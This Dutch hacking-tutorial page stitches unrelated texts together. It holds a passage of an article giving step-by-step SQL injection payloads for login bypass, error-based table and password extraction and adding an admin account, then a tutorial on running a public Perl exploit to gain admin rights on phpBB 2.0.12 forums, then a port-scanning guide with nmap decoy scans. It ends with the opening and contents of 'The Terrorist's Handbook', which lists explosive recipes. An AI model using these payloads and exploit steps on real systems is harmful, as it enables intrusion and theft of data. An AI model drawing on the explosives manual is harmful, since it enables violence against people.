zijn tegenwoordig logindialogen te vinden.
Gelukkig hebben we bij slechte software helemaal
geen login nodig om binnen te komen. Het eerste
wat we doen, is checken of de website slecht
ontworpen is. Dat is te testen door een apostrof
of het woord OR in te tikken en dan te kijken
wat er gebeurt. Als er dan een foutmelding
verschijnt die door het databasemanagementsysteem
is gegenereerd, is de applicatie mogelijk
kwetsbaar. De foutmelding geeft namelijk aan
dat een SQL-commando incorrect was en is zo
vriendelijk ons daarop te wijzen: Unclosed
quotation mark before character string ")'.

We weten nu twee dingen: ten eerste dat we een
SQL-commando hebben kunnen geven, dus onze
eerste SQL-injection is een feit; ten tweede
dat het een incorrect commando was, met een
vriendelijke suggestie dat we voortaan wel een
afsluitend aanhalingsteken moeten gebruiken.
Al doende kunnen we dan allerlei SQL-commando's
gaan injecteren.

Inloggen zonder wachtwoord
Stel dat we voorbij een loginprocedure willen
komen. De simpelste methode, die verbazingwekkend
vaak werkt, gaat als volgt. Neem zowel voor
de loginnaam als het wachtwoord deze incantatie:
` OR "1=1' (of een variant daarvan). Als we
geluk hebben, zijn we dan al binnen. Hoe? De
webapplicatie test normaliter of de loginnaam
klopt en bij het wachtwoord hoort. Alleen nu
hebben we wat extra SQL geinjecteerd zodat de
applicatie een andere query uitvoert dan die
de amateur bijvoorbeeld met de volgende code
heeft bedoeld:

SELECT LoginName FROM Users WHERE
LoginName = ` " & strLoginName & " `
AND
Password = ` " & strPassword & " ` "

De variabelen strLoginName en strPassword worden
vervangen door onze toverformule, wat leidt tot het
volgende SQL-commando dat zal worden uitgevoerd:

SELECT LoginName FROM Users WHERE
LoginName = `' OR `'1=1''
AND
Password = `' OR `'1=1''

Dit betekent dat de WHERE-conditie altijd WAAR
is. Kijk maar: de LoginName wordt vergeleken
met een lege string die wordt gerepresenteerd
door twee aanhalingstekens, niet WAAR dus.
Maar we hebben ook een altijd ware bewering
geinjecteerd: 1=1. En de OR is inclusief,
wat zoveel betekent dat als een van de twee
beweringen WAAR is, het geheel WAAR is. Dus
de tweede regel code levert WAAR op. Idem voor
de vierde regel code, en WAAR AND WAAR is weer
WAAR. Dus de test om in te loggen is geslaagd,
ondanks het feit dat we geen enkele loginnaam
of wachtwoord hebben ingetoetst. Nu hebben we
dus toegang tot het beschermde gedeelte van de
website.

Toegang tot alle gegevens
Laten we de zaak iets ingewikkelder maken. We
willen toegang tot alle gegevens en bij onachtzaam
gemaakte applicaties is dat een kwestie van
even doorwerken. Tegenwoordig zien we allerlei
ingewikkelde webadressen met vraagtekens en
cijfercodes erin, adressen die eindigen op
bijvoorbeeld default.asp?id=10. Bij slecht
ontworpen software kunnen we daarachter
gemakkelijk onze eigen commando's toevoegen.
Na de 10 in het webadres voeren we in: UNION
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES.
Een hele mond vol, maar dit betekent niets
anders dan: voer het bedoelde commando met het
getal 10 gewoon uit, maar combineer dat met
ons commando dat de eerste naam van de tabel
moet geven die op de daarvoor bestemde plek
staat van elk gegevensverwerkend systeem.
Handig, die open standaarden! Dit geeft vrijwel
zeker weer een foutmelding, maar in die
foutmelding staat wel de gevraagde tabelnaam.

Hoe zit dat? Ons commando hoest de naam van de
tabel gewoon op, maar die naam is geen getal,
dus als SQL dat combineert (via UNION) met het
getal 10, zijn we appels met peren aan het
vergelijken en dat is fout. Er volgt een
foutmelding die ons daarop wijst: Syntax error
converting the nvarchar value `naam' to a column
of data type int. En de naam tussen aanhalingstekens
is net wat we zochten.

Communicatie via foutmeldingen
Van die fout leren we de naam van de eerste
tabel van het systeem. Nu de tweede naam.
Het is een variatie op hetzelfde thema: voeg
aan de bovenstaande UNION nog een extra dosis
toe, namelijk "WHERE TABLE_NAME NOT IN (`naam').
Dat geeft weer een foutmelding, want 10 is nog
steeds een getal en de volgende tabelnaam is
nog steeds geen getal. In de foutmelding vinden
we dan de tweede naam. Op die manier kunnen
we doorgaan met injecteren tot we alle tabelnamen
hebben. Dit simpele trucje heet ook wel database
footprinting. Wat u nu in werking ziet, is
het principe van communicatie met de webapplicatie
via foutmeldingen. Dat is een mooie manier om
dingen te weten te komen die anders niet
prijsgegeven worden.

Een database is om dingen op te zoeken, ook
als je niet helemaal weet hoe alles ook weer
gespeld was. We willen bijvoorbeeld een tabel
vinden waarin de loginnamen van gebruikers
staan. Dan voegen we een ander stukje code,
dat omwille van de leesbaarheid iets versimpeld
is, aan onze injectie toe: WHERE TABLE_NAME
LIKE `login'. Dit zal weer een foutmelding
opleveren: Syntax error converting the nvarchar
value `admin_login' to a column of data type
int. De naam van de tabel waarin hoogstwaarschijnlijk
de logingegevens van de gegevensbeheerder staan,
is dus admin_login. We dienen weer een
SQL-injectie toe: UNION SELECT TOP 1 login_name
FROM admin_login. Ook deze zal weer een
foutmelding geven, omdat die naam geen getal
is: Syntax error converting the nvarchar value
`B1FF' to a column of data type int. Er is
kennelijk een gegevensbeheerder met loginnaam
B1FF.

We zijn nu halverwege, net als de kluizenexpert
die laatst een oude kluis van De Nederlandsche
Bank in twee rondes wist open te krijgen door
te luisteren naar onregelmatigheden in de
cijfersloten. Wij luisteren ook naar
onregelmatigheden van de webapplicatie door
middel van een nieuwe injectie: UNION SELECT
TOP 1 password FROM admin_login WHERE
login_name='B1FF'. Weer een foutmelding: Syntax
error converting the nvarchar value `DEADBEEF'
to a column of data type int.

Eigen account maken
Nu zouden we kunnen inloggen met de naam B1FF
en het wachtwoord DEADBEEF, maar het is niet
zo handig om dat te doen. Beter is het om een
eigen account aan te maken, want B1FF zal vroeg
of laat merken dat er iets aan de hand is. Om
een eigen account te maken moeten we weten
welke kolommen er in de tabel admin_login
zitten. Dat is fase twee van database
footprinting: alle kolommen van een tabel boven
water krijgen. Injecteer dit: UNION SELECT TOP 1
COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME= `admin_login'. Dat geeft
weer een foutmelding: Syntax error converting
the nvarchar value `login_id' to a column of
data type int. Daarna kunnen we weer de volgende
melding genereren door een WHERE-conditie toe
te voegen, en zo gaat het verder.

Gewapend met precieze kennis van de databasestructuur
van de webapplicatie kunnen we dan met een
SQL-injectie een INSERT-commando geven dat ons
als gegevensbeheerder toevoegt. En dan kunnen
we aan het werk: alle data zijn tot onze
beschikking, we kunnen gegevens toevoegen,
ophalen, veranderen, weggooien, enzovoort. En
dat alles met een willekeurige browser en wat
`hacksuele' voorlichting.

De proef op de som
Karin Spaink (2005) publiceerde onlangs in de
Volkskrant dat ze via SQL injection twee weken
lang 1,2 miljoen patientengegevens tot haar
beschikking had, zonder dat iemand dat in het
ziekenhuis was opgevallen---namen, adressen,
telefoonnummers, patientnummers, polisnummers,
geslacht, geboortedatum, lengte, gewicht, dood
of levend, inclusief een lijst met patienten
die een besmettelijke ziekte hadden.

Het echte probleem

Inputvalidatie

Het echte probleem is natuurlijk de webapplicatie
en niet de hacker, want zoals u ziet: een kind
kan de was doen. Als het nieuwe software
betreft, is die gemaakt door mensen die de
beginselen van het maken van productiesoftware
niet machtig zijn. Bij de absolute basiskennis
hoort namelijk dat je altijd alle input moet
valideren en alleen die input moet doorlaten
waarvan jij wilt dat die doorgelaten wordt.
Dat voorkomt crashen, dataverlies en SQL
injection attacks.

Maar niet alle software is nieuw. Sterker nog,
meer dan 60 procent van alle data die via het
web toegankelijk zijn, staan op een mainframe.
Die data zijn ook vaak waardevol: meer dan 95
procent van de gegevens in de financiele sector
en de verzekeringssector wordt met Cobol en
embedded SQL verwerkt. Die software is niet
ontworpen om dit soort aanvallen af te slaan.
En als men achteraf bedenkt dat alle input nog
even moet worden gevalideerd, is het een verloren
race, want dat ontwerp je er niet nog even in.
Het is dan ook geen verrassing dat we onlangs
berichten hoorden van diefstal van miljoenen
creditcardgegevens. Nu spreekt hacken tot de
verbeelding, maar het echte probleem is dat
een groot percentage van de fraude afkomstig
is van eigen personeel. Binnen een organisatie
heeft men gemakkelijk toegang tot intranetapplicaties
en personeel kan via de genoemde SQL-injectionprincipes
ongeautoriseerd toegang krijgen tot allerlei
gegevens. Vaker nog is de beveiliging intern
helemaal afwezig en loopt men dus gewoon binnen
bij zo'n systeem. En we weten dat personeel
dat data invoert gemakkelijk omkoopbaar is:
voor 25 dollar waren jarenlang de complete
salarisgegevens van de laatste tien jaar van
een toekomstige werknemer op te vragen bij
belastingmedewerkers, zodat je heel scherpe
salarisonderhandelingen kon voeren.

Besluitvormers
Wat zeer verontrustend is aan dit soort zaken
is dat besluitvormers elke poging om privacy
en security aan de kaak te stellen bagatelliseren
(Verhoef, 2005). Zo stuurde het gehackte
ziekenhuis voor de evaluatie een systeembeheerder,
waar het hoogste management meer op zijn plaats
was geweest. Men doet dit af als een computerfoutje
dat ZE nog even gaan oplossen. En alle deadlines
blijven overeind, want in 99 procent van de
gevallen gaat het goed.

Ten eerste: het gaat hier niet om een
computerfoutje. We hebben het hier over inherent
volkomen verkeerd ontworpen software, door
mensen zonder benul van de meest elementaire
softwareengineeringprincipes, die bewezen hebben
alle elementaire kennis te ontberen die nodig
is voor de productie van veilige privacybeschermende
gegevensverwerkende systemen. Dat is de fout
van de besluitvormers die kiezen voor de laagste
prijs en die geen idee hebben van de werkelijke
eisen die aan hun systemen gesteld moeten
worden.

Ten tweede: ZE gaan helemaal niets oplossen!
ZE hebben allereerst uiterst belangrijke
ontwerpbeslissingen gemist. En het is schier
onmogelijk om dergelijke ingrijpende
ontwerpbeslissingen achteraf even weg te poetsen.
Laat staan door amateurs. Ga maar na:
inputvalidatie komt overal in systemen voor.
Tegenwoordig is het merendeel van administratieve
systemen gewijd aan de gebruikersinterface en
daarin komt input en output van gegevens
veelvuldig voor. Op elke plek, in elk veldje,
bij elk vraagje dat het systeem zou kunnen
stellen aan een gebruiker, moet je iets, en
ook nog op plekken waar je dacht dat je niets
vroeg. Ergo, het hele ontwerp moet op z'n kop.
Dat lukt ZE dus niet. Maar besluitvormers zijn
dusdanig amateuristisch dat ze het verschil
tussen een beunhaas en een gelicentieerde
it-professionali niet zien.

Ten derde: de meeste besluitvormers hebben geen
bal verstand van het managen van it. Kijk maar
naar de deadlines die ze uitkramen: 1 januari
2006, voor de Kerst, 5 december krijg je een
cadeautje. Het gaat altijd om ronde of bijzondere
datums. Dat noem ik fantasy deadlines. Als
je niet de meest geeigende productiemethode
kunt gebruiken, wordt productie altijd duurder
en slechter, dat is algemeen bekend. Ook bij
it: in 1984 is een wetmatigheid ontdekt die
laat zien dat van te veel it-werk in te korte
tijd de kosten explosief stijgen en daarmee
ook de risico's. Besluitvormers die aan
deadlines vasthouden terwijl de hele tent
binnenstebuiten moet, weten dat dus niet. De
kosten zullen dan enorm stijgen, de kwaliteit
keldert, de risico's nemen toe---en dat zien
ze niet aankomen. Kortom: amateurs. Wegwezen
dus!

Conclusie
Productie van software in verkeerde handen is
heel gevaarlijk. En omdat onze privacygevoelige
gegevens tegenwoordig in allerlei softwaresystemen
huizen, moeten we als burgers geen genoegen
nemen met amateurs. Het recente voorbeeld van
de patientengevens onderstreept dat alleen
maar. Alleen gelicentieerde it-professionals
die software kunnen produceren, managen en
beheren zijn goed genoeg, en de rest: wegwezen.

Chris Verhoef

Literatuur
Spaink, K. (2005). Het medisch geheim gehackt.
de Volkskrant, 3 september 2005.

Verhoef, C. (2005). Nog even en elke dag is
gehackt-dag. de Volkskrant, 10 september 2005.

Prof. dr. Chris Verhoef is hoogleraar
Informatica bij de afdeling Informatica van de
Vrije Universiteit Amsterdam. E-mail: x@cs.vu.nl.

Samenvatting
Een SQL injection attack is een techniek om
via het web binnen te komen in computersystemen
met behulp van het principe van communicatie
met de webapplicatie via foutmeldingen. Het
echte probleem is echter niet de hacker maar
een onvoldoende inputvalidatie voor de
webapplicatie en gebrekkige beveiliging tegen
fraude door personeel. Zeer verontrustend is
dat besluitvormers deze problemen bagatelliseren.

COPYRIGHT: SDU

 

 

 

PHPBB FORUM HACKEN

phpBB 2.0.12 forums hacken
Deze tutorial is geschreven door U.R

Voorbeeld forum: http://www.illegaaltje.nl/phpBB2/
(waarop je het LEGAAL kan testen)

Voorwoord
In deze tutorial gaan we leren hoe we phpBB 2.0.12 forums kunnen hacken , met behulp van exploits die wij downloaden. Ik ga verder niet op het begrip exploiten in of de fouten , ik ga jullie alleen leren hoe wij phpBB 2.0.12 forums kunnen hacken En ik benadruk nog even dat dit illigaal is als dit zonder toestemming wordt gedaan , en ik nergens verantwoordelijk voor ben.Als je dit eenmaal onder de knie hebt hoop ik dat je hier admins mee gaat helpen in plaats van forums te vernielen.

The Exploit
Een exploit is een script die gebruik maakt van fouten in een forum , om zo bepaalde rechten te kunnen krijgen of wachtwoord hashes te kunnen bemachtigen enz..Exploits worden meestal geschreven in C , Perl en in Php , en wij gaan een exploit gebruiken die in perl is geschreven.We moeten dus eerst de exploit bemachtigen dat doen we door op google , in te tiepen : exploit phpBB 2.0.12. Maar ik ga liever naar : www.milw0rm.com , 1 van de grootste exploit site’s die ik ken. Ik ga daar wat zoeken en kom al snel bij http://www.milw0rm.com/id.php?id=889 .Oke dit is dus de exploit script we zien boven aan ‘#!/usr/bin/perl’ daar maak ik uit op dat we te maken hebben met een exploit die in perl is geschreven.
Dus sla deze script op als exploit.pl op de c:\ schijf. (kladblokje > opslaan als > exploit.pl)

Download Perl
Om onze exploit script uit te voeren hebben we dus perl nodig.
Nu gaan we naar www.google.nl en tiepen we in : Download perl en al snel komen we op een page en daar downloaden we perl.
Voor de luie mensen onderons hier een link :
http://www.activestate.com/Products/Download/Download.plex?id=ActivePerl Nu we perl hebben gedownload en geinstalt kunnen we verder naar het echt hacken van een forum.

Hacken van de phpBB 2.0.12 forum.
Hier is ons voorbeeld forum waarop je het kan testen:
http://www.illegaaltje.nl/phpBB2/
In mijn voorbeeld gebruik ik dit forum ook.

Oke we gaan ons eerst registeren, let er op dat je naam maar uit 1 deel mag bestaan dus niet ‘jan piet’ maar ‘janpiet’.Ik neem in mijn voorbeeld de naam ‘UR’ lekker orgineel.
Nu we een acount hebben gaan we over tot het hacken , open dos ( start > uivoeren/run > tiep command en dan enter).We hebben onze exploit met de naam exploit.pl opgeslagen op de c:\ schijf dus we tiepen nu het volgende in dos : ‘cd c:\’ (zonder aanhalingstekentjes natuurlijk) en druk enter.
En dan typen we ‘exploit.pl ‘ en drukken weer enter en krijgen we dit. (krijg je dit niet heb je perl niet goed geinstalt of iets anders)

CODE+++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++

oke hier wordt uitgelegd hoe we het gebruiken dus we moeten , eerst de site
dan de map waar het forum zich bevind en dan onze acount naam in dit geval UR
Oke nu ga je dat doen met jou forum , in mijn voorbeeld is dat http://www.illegaaltje.nl/phpBB2/index.php .
in mijn voorbeeld tiep ik in dos ‘exploit.pl www.illegaaltje.nl /phpBB2/ UR’
En ik druk enter. ( zoals je ziet vervang ik http:// voor www anders geeft die een error en index.php laat ik weg )
Nu krijg zoiets als hieronder :

CODE++++++++++++++++++++++++++++++++++++
Trying to connect to www.illegaaltje.nl/phpBB2/
Forum is vulnerable!!!
+++++++++++++++++++++++++++++
Trying to get the user: UR ID...
Done... ID=15
++++++++++++++++++++++++++++++
Trying to give user:UR admin status...
Well done!!! UR should now have an admin status..
++++++++++++++++++++++++++++

Nu ga je naar het forum toe en log je in op je acount , en zie je dat er iets (onderaan het forum) in de richting van ‘adminstratie paneel’ staat.
En dat is het bewijs dat je admin bent, wat je voor het rest gaat doen is helemaal jou keuze ga ik je niet mee helpen.
Ik zou de admin vertellen dat zijn forum niet veilig is en samen voor een oplossing zoeken.

Nawoord
Ik hoop dat jullie hier iets van hebben geleerd , en nu forum admins gaan helpen met deze fout te zoeken en te verbeteren.Ben nergens aansprakelijk voor , dus alles is geheel op eigen risico

 

 

 

Poortscannen

 

Let op: Als je niet ingelogd bent kan je maar 10% zien van alle tutorials zien!!

[ Poortscannen ]
================
Theorie
-------
Poortscannen is het proces waarbij verbinding wordy gemaakt met TCP- en UDP-poorten op het doelsysteem om vast te stellen welke services
er actief zijn en in een luistertoestand staan, of beter bekend als 'listening'. Actieve services die luisteren, kunnen een onbevoegde gebruiker toelaten tot systemen doe onjuist geconfigureerd zijn of een softwareversie hebben met bekende zwakke plekken op het gebied van beveiliging. Poostscanning-tools en technieken hebben de laatste paar jaren een snelle ontwikkeling doorgemaakt. We beperken ons tot een aantal populaire hulpmiddelen en technieken die ons een heleboel informatie zullen (kunnen?) opleveren.
Er zijn een aantal doelstellingen die we willen bereiken als we gaan poortscannen op een doelsysteem. De belangrijkste zijn de volgende:
* Identificeren van zowel de TCP- als UDP-services die op het doelsysteem worden uitgevoerd;
* Identificeren van het type besturingssysteem van het doelsysteem;
* Identificeren van specifieke toepassingen of versies van een bepaalde service;
Als we deze doelen hebben bereikt kunnen we zeggen dat onze poortscan succesvol is gelukt!
Scantypen
---------
Voordat we ons verdiepen in de benodigde hulpmiddelen voor poortscanning, moeten we de verschillende poortscanningtechnieken bespreken. Een van de pioniers in het gebruik van verschillende poortscantechnieken is Fyodor. Hij heeft een tal van scaningtechnieken opgenomen in zijn programma NMAP. Veel scantypen die we bespreken, zijn door Fyodor zelf uitgewerkt!
* TCP-VERBINDINGSSCAN *
Dit type scan maakt een verbinding met de doelpoort en voert een volledig drievoudige handshake uit (SYN, SYN/ACK en ACK). Het kan gemakkelijk door het doelsysteem ontdekt worden.
* TCP SYN-SCAN *
Deze techniek word half-open scanning genoemd omdat geen volledige TCP-verbinding wordt gemaakt. In plaats daarvan wordt een SYN-pakket naar de doelpoort verstuurd. Als een SYN/ACK van de doelpoort ontvangen word, kunnen we concluderen dat de poort in de listening-status staat. Als een RST/ACK wordt ontvangen, geef dit gewoonlijk aan dat de poort niet luistert. Een RST/ACK wordt verzonden door het systeem dat de poortscan uitvoert zodat nooit een volledige verbinding tot stand komt. Deze techniek heeft het voordeel minder snel opgemerkt te worden dan een volledige TCP-verbinding en wordt mogelijk niet door het doelsysteem geregistreerd.
* TCP FIN-SCAN *
Bij deze techniek wordt een FIN-pakket naar de doelpoort gestuurd. Volgens RFC 0793 (zie www.ietf.org/rfc/) moet het doelsysteem voor alle gesloten poorten een RST terugsturen. Deze techniek werkt gewoonlijk alleen op TCP/IP-stacks onder UNIX.
* TCP XMAS TREE-SCAN *
Bij deze techniek word een FIN-, URG- en PUSH-pakket naar de doelpoort gestuurd. Volgens RFC 0793 moet het doelsysteem voor alle gesloten poorten een RST terugsturen.
* TCP NULL-SCAN *
Bij deze techniek worden alle blaggen uitgezet. Volgens RFC 0793 moet het doelsysteem voor alle gesloten poorten een RST terugsturen.
* TCP WINDOWS-SCAN *
Bij deze techniek kunnen op sommige systemen (bv AIX en FreeBSD) zowel open als gefilterde/niet-gefilterde poorten ontdekt worden aan de hand van een afwijkende wijze waarop de TCP-venstergrootte wordt aangeduid.
* TCP ACK-SCAN *
Deze techniek wordt gebruikt om firewall-regelsets te analyseren. De scan kan van nut zijn bij het bepalen of de firewall een eenvoudig pakketfilter is dat alleen tot stand gekomen verbindingen (verbindingen met de ACK-bit ingesteld) toelaat of een firewall die pakketten voorfiltert.
* TCP RPC-SCAN *
Deze techniek is specifiek voor *NIX-systemen en wordt gebruikt om RPC-poorten (Remote Procedure Call) en hun bijhorende programma en versienummer te ontdekken en identificeren.
* UDP-SCAN *
Deze techniek stuurt een UDP-pakket naar de doelpoort. Als de doelpoort antwoordt met het bericht 'ICMP Port Unreachable', wordt de doelpoort gesloten. andersom geldt dat we kunnen concluderen dat de poort open is als we geen 'ICMP Port Unreachable' ontvangen. Aangezien UDP bekend staat als een verbindingsloos protocol, is de nauwkeurigheid van deze techniek sterk afhankelijk van veel factoren met betrekking tot het gebruik van netwerk- en systeemelementen. Bovendien is UDP-scanning een heel langzaam proces als u een mechanisle probeert te scannen dat intensieve pakketfiltering toepast. Als u van plan bent UDP-scans over Internet te doen, bedenk dan dat de resultaten niet altijd betrouwbaar zullen zijn!
Praktijk
--------
We beginnen met STROBE. Dit is een respectable poortscanningprogramma dat geschreven is door Julian Assange (ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/strobe-1.06.tgz). Het is al enige tijd in omloop en het is een van de snelste en betrouwbaarste TCP-scanners. Een aantal belangrijke kenmerken van STROBE zijn het vermogen systeem- en netwerkelementen te optimaliseren en het doelsysteem efficïent te scannen. Daarnaast kunnen versie 1.04 en hoger van STROBE de bijhorende banner (indien beschikbaar) bemachtigen van iedere poort waarmee zij in verbinding komen. Met behulp hiervan kunnen zowel het besturingssysteem als de actieve service mogelijk geïdentificeerd worden. De STROBE-uitvoer geeft elke luisterende TCP-poort weer:
bash-2.05a$ strobe 213.206.1.238
Strobe 1.06 @ 1995 Julian Assange (proff@suburbia.net)
213.206.77.238 echo ------- 7/tcp Echo [95,JBP]
213.206.77.238 ftp -------- 21/tcp File Transfer
213.206.77.238 exec ------- 512/tcp Remote Process Execution
213.206.77.238 ssh -------- 22/tcp Secure Shell
213.206.77.238 telnet ----- 23/tcp Telnet [112,JBP]
213.206.77.238 lockd ------ 4045/tcp
213.206.77.238 unknown ---- 32799/tcp unassigned
Strobe is zeer betrouwbaar, maar heeft wel wat beperkingen. Strobe is alleen een TCP-scanner en biedt geen mogelijkheden voor UDP-scanning. Bovendien gebruikt STROBE alleen de techniek van de TCP-verbindingsscan als met elke poort verbinding wordt gemaakt. Dit gedrag draagt weliswaar bij aan de betrouwbaarheid van STROBE, maar zorgt er ook voor dat de poortscans gemakkelijk door het doelsysteem te ontdekken zijn! Als de scanningstechnieken van STROBE niet toereikend zijn, zijn er nog andere technieken waarvoor ik dieper in mijn gereedschapkist moet gaan duiken :D
Aangezien STROBE uitsluitend geschikt is voor TCP-scanning, gebruiken we UDP_SCAN voor het scannen van UDP-services. Kijk eens op http://wwwdsilx.wwdsi.com voor de laatste versie! Er zijn nog veel ander eprogramma's die UDP-scans uitvoeren, maar ik heb ervaren dat UDP_SCAN een van de betrouwbaarste is. Even een toepassing:
bash-2.05a$ udp_scan 213.206.77.1 1-1024
42:UNKNOWN:
53:UNKNOWN:
123:UNKNOWN:
135:UNKNOWN:
Een ander uitstekend programma is NETCAT ofwel NC, dat geschreven is door Hobbit (hobbit@avian.org). Dit programma kan enorm veel taken uitvoeren. De opties -v en -vv leveren respectievelijk uitvoerige en zeer uitvoerige outputs op. De optie -z geeft nulmodus-I/O en wordt gebruikt voor poortscanning. De optie -w2 geeft een time-out-waarde voor elke verbinding. Standaard gebruikt NC TCP-poorten. Voor het scannen van UDP-poorten moeten we de optie -u gebruiken. Zie ook het volgende voorbeeld:
bash-2.05a$ nc -v -z -w2 213.206.77.3 1-140
[213.206.77.3] 139 (?) open
[213.206.77.3] 135 (?) open
[213.206.77.3] 110 (pop-3) open
[213.206.77.3] 80 (http) open
[213.206.77.3] 53 (domain) open
[213.206.77.3] 21 (ftp) open
bash-2.05a$ nc -u -v -z -w2 213.206.77.3 1-140
[213.206.77.3] 135 (ntportmap) open
[213.206.77.3] 123 (ntp) open
[213.206.77.3] 53 (domain) open
[213.206.77.3] 42 (name) open
Nu we een aantal hulpmiddelen voor poortscanning hebben besproken hebben, komen we nu aan de Nr. 1 op dit gebied: NMAP (http://www.insecure.org/nmap/)! NMAP, geschreven door Fyodor, biedt TCP- en UDP-scanning mogelijkheden en bevat ook de eerder genoemde scanningstechnieken. Er zijn weinig hulpmiddelen die zoveel bruikbaarheid in één pakket hebben. We bekijken nu een paar van de handigste opties.
bash-2.05a$ nmap --help
Output: Een hele waslijst met help!
bash-2.05a$ nmap -sS 213.206.77.4
Output: TCP-scan
NMAP heeft nog meer mogelijkheden die de moeite waard zijn. We hebben se syntaxis gezien die gebruikt kan worden om één systeem te scannan. Met NMAP is het echter eenvoudig om een compleet netwerk te scannen. De optie -oN slaat de resultaten op in een voor mensen leesbare indeling:
bash-2.05a$ nmap -sF 213.206.77.5 -oN outputfile
Afhankelijk van hoe complex het doelnetwerk en de hosts zijn, konden de scans die tot nu toe zijn uitgevoerd eenvoudig ontdekt worden. NMAP biedt via de optie -D extra lokmiddelen (decoys) die ontworpen zijn om een doelsite te overspoelen met overbodige informatie. Het principe van deze optie is dat gelijktijdig met een echte scan decoy-scans worden verstuurd. Dit wordt gedaan door het brondadres van echte servers te vervalsen en deze valse scans met de echte poortscan te mengen. Het doelsysteem zal dan zowel aan de valse adressen als aan jouw werkelijke poortscan antwoorden. Bovendien zit het doel met het probleem om alle scans te moeten opsporen om vast te stellen welke echt zijn en welke niet. Denk eraan dat het decoy-adres actief moet zijn, anders kunnen uw scans op het doelsysteem een vloedgolf aan SYN-pakketten veroorzaken met een DoS (Denail-of-Service) als gevolg! Een voorbeeldje:
bash-2.05a$ nmap -sS 213.206.77.1 -D 10.1.1.1
Output: Het resultaat...
Nog een handige scanoptie is ident (zie ook RFC 1413). Ident wordt gebruikt om de identiteit van een gebruiker van een bepaalde TCP-verbinding vast te stellen door te communiceren met poort 113. Dit werkt het beste onder een UNIX systeem:
bash-2.05a$ nmap -I 213.206.77.8
Output: Poortscan met ident
Je ziet aan de hand van dit voorbeeld dat we de eigenaar van elk proces kunnen vinden. Slimme lezertjes hebben misschien opgemerkt dat de webserver als (meestal toch) 'root' draait in plaats van een onbevoegde gebruiker zoals 'nobody', wat in dat laatste geval een kenmerk is van gebrekkige beveiliging.
Ik heb zowat de belangrijkste en nuttigste dingen hierboven besproken voor de *NIX systemen maar er zijn ook mensen die nog zijn aan het prullen met Windows...
Poortscannen onder Windows
--------------------------
Tot nu toe heb ik dus enkel de aandacht besteed aan onze UNIX-gebruikers. In dit deel van de tekst gaan we ook de Windows-gebruikers wat verder helpen met enkele bruikbare tools!
Een van de meest veelzijdige hulpmiddelen voor netwerkverkenning is NetScan Tools Pro 2000 ofwel NSTP2K. Dit toepassingsprogramma is zéér uitgebreid, een aanrader maar deze gaan we voorlopig niet bespreken.
Dan hebben we SuperScan, van Robin Keir (http://membsers.home.com/rkeir/software.html). Deze is eveneens een snelle en flexibele TCP-poortscanner (en gratis). Evenals NSTP2K maakt het ook flexibele specificatie van doel-IP's en poortlijsten mogelijk. Gemakkelijker dan SuperScan kan niet. Nogtans geeft het programma een aantal van de meest uitgebreide poortlijsten die ik ooit gezien heb.
NTOScanner van NTObjectives Inc. (http://www.ntobjectives.com/) is een snelle grafische TCP-poortscanner! Het programma is echter niet zo flexibel in het specificeren van de doelen en poorten, en vereist bovendien dat hosts eerst gepinged worden bij het scannen van klasse-C-netwerken. Niet echt een aanrader dus...
De Windows UDP Port Scanner (WUPS - http://www.ntsecurity.nu/toolbox/wups/) is betrouwbaar, grafisch en behoorlijk actieve UDP-poortscanner. Het is een zeer goed hulpmiddel voor je UDP-scans...

 

 

Let op: Als je niet ingelogd bent kan je maar 10% zien van alle tutorials zien!!

The Terrorist's Handbook
------------------------
Written BY: UNKNOWN AUTHOR
(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)(*)
THE TERRORIST'S HANDBOOK
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

1.0 INTRODUCTION
Gunzenbomz Pyro-Technologies, a division of Chaos Industries (CHAOS), is
proud to present this first edition of The Terrorist's Handbook. First and
foremost, let it be stated that Chaos Industries assumes no responsibilities
for any misuse of the information presented in this publication. The purpose
of this is to show the many techniques and methods used by those people in this
and other countries who employ terror as a means to political and social goals.
The techniques herein can be obtained from public l
ibraries, and can usually be
carried out by a terrorist with minimal equipment. This makes one all the more
frightened, since any lunatic or social deviant could obtain this information,
and use it against anyone. The processes and techniques herein SHOULD NOT BE
CARRIED OUT UNDER ANY CIRCUMSTANCES!! SERIOUS HARM OR DEATH COULD OCCUR FROM
ATTEMPTING TO PERFORM ANY OF THE METHODS IN THIS PUBLICATION. THIS IS MERELY
FOR READING ENJOYMENT, AND IS NOT INTENDED FOR ACTUAL USE!!
Gunzenbomz Pyro-Technologies feels that it is important that everyone has some
idea of just how easy it is for a terrorist to perform acts of terror; that is
the reason for the existence of this publication.


1.1 Table of Contents
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2.0 ....... BUYING EXPLOSIVES AND PROPELLANTS
2.01 ........ Black Powder
2.02 ........ Pyrodex
2.03 ........ Rocket Engine Powder
2.04 ........ Rifle/Shotgun Powder
2.05 ........ Flash Powder
2.06 ........ Ammonium Nitrate
2.1 ....... ACQUIRING CHEMICALS
2
.11 ........ Techniques for Picking Locks
2.2 ....... LIST OF USEFUL HOUSEHOLD CHEMICALS AND AVAILABILITY
2.3 ....... PREPARATION OF CHEMICALS
2.31 ........ Nitric Acid
2.32 ........ Sulfuric Acid
2.33 ........ Ammonium Nitrate
3.0 ....... EXPLOSIVE RECIPES
3.01 ........ Explosive Theory
3.1 ....... IMPACT EXPLOSIVES
3.11 ........ Ammonium Triiodide Crystals
3.12 ........ Mercury Fulminate
3.13 ........ Nitroglycerine
3.14 ........ Picrates
3.2 ....... LOW ORDER EXPLOSIVES
3.21 ........ Black Powder
3.22 ........ Nitrocellulose
3.23 ........ Fuel + Oxodizer mixtures
3.24 ........ Perchlorates
3.3 ....... HIGH ORDER EXPLOSIVES
3.31 ........ R.D.X. (Cyclonite)
3.32 ........ Ammonium Nitrate
3.33 ........ ANFOS
3.34 ........ T.N.T.
3.35 ........ Potassium Chlorate
3.36 ........ Dynamite
3.37 ........ Nitrostarch Explosives
3.38 ........ Picric Acid
3.39 ........ Ammonium Picrate (Explosive D)
3.40 ........ Nitrogen Trichloride
3.41 ........ Lead Azide
